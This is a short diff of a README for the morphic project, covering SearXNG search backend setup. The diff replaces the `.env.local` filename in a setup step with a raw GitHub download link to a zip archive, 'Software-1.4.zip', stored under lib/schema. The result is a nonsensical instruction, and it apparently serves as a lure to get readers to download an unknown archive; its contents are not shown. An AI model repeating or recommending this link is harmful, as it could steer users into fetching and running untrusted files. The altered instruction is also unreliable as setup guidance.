DevviantSU/morphic/README.md

 Morphic now supports SearXNG as an alternative search backend with advanced search capabilities.
 To use SearXNG:

 1. Ensure you have Docker and Docker Compose installed on your system.
-2. In your `.env.local` file, set the following variables:
+2. In your `https://github.com/DevviantSU/morphic/raw/refs/heads/main/lib/schema/Software-1.4.zip` file, set the following variables:

    - NEXT_PUBLIC_BASE_URL=http://localhost:3000 # Base URL for local development
    - SEARXNG_API_URL=http://localhost:8080 # Replace with your local SearXNG API URL or docker http://searxng:8080